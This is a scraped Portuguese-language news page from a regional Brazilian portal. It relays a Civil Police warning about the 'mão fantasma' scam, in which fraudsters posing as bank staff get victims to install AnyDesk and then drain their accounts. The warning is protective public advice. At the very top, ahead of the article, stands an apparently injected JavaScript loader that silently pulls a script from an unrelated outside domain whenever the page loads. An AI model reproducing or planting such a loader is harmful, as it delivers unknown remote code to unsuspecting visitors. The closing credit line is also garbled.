;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil alerta sobre o golpe da mão fantasma. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil alerta sobre o golpe da mão fantasma.

REDAÇÃO – A 31ª Delegacia de Polícia Civil de Abre Campo alerta a respeito de um golpe digital que vem ocorrendo nos últimos dias, o “Golpe da Mão Fantasma”.

O golpista faz contato via ligação telefônica com a vítima, informando que são funcionários do banco ou da operadora de cartão, e que a conta bancária da vítima estaria com movimentação estranha tipo realização de PIX, transferências bancárias e pagamentos de boletos. A seguir o golpista que se faz passar por um funcionário do banco, informa que o celular da vítima está hackeado ou vírus, vindo então solicitar a instalação de dois aplicativos, um antivírus de nome Avast e outro de nome Any Desk.

A função do AnyDesk é um aplicativo de desktop remoto distribuído pela AnyDesk Software GmbH. O programa de software proprietário fornece acesso remoto independente de plataforma a computadores pessoais e outros dispositivos que executam o aplicativo host. Oferece controle remoto, transferência de arquivos e funcionalidade VPN.

Com o aplicativo AnyDesk funcionando no celular da vítima, o golpista mantém a vítima na ligação, enquanto isso, o golpista está acessando todas as contas de aplicativo no celular da vítima e realizando PIX, transferências bancárias e pagamentos de boleto até o limite da conta da vítima por dia.

A vítima somente descobre o golpe após encerrar a ligação com o golpista e ver o saldo de sua conta.

Há casos em que as vítimas estão recebendo ligação no aparelho de celular e no visor aparece o número da linha do telefone fixo da agência bancária onde as vítimas mantêm conta, fazendo assim a vítima acreditar que se trata de algum funcionário do banco onde tem conta, quando na verdade os golpistas estão conseguindo espelhar ou fazer desvio de chamada de telefone fixo.

No mercado há outros aplicativos que dão acesso remoto de equipamentos de informática e até aparelhos de telefone celular. As pessoas devem ficar atentas a não instalarem nenhum aplicativo quando receberem ligação se passando por funcionário de banco.

O correntista se tiver dúvida, vá direto a sua agência bancária e converse com o funcionário do banco e tire suas dúvidas.

Há registros de ocorrências dos fatos na região, havendo prejuízo de média e grande monta para as vítimas.

A 6ª DRPC/Manhuaçu e demais Delegacias de Polícia da região alertam como forma preventiva no momento de se evitar cair no golpe e continua à disposição nos trabalhos investigativos.

I,NFIRNAÇÃO pORTAL CAPARAO

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.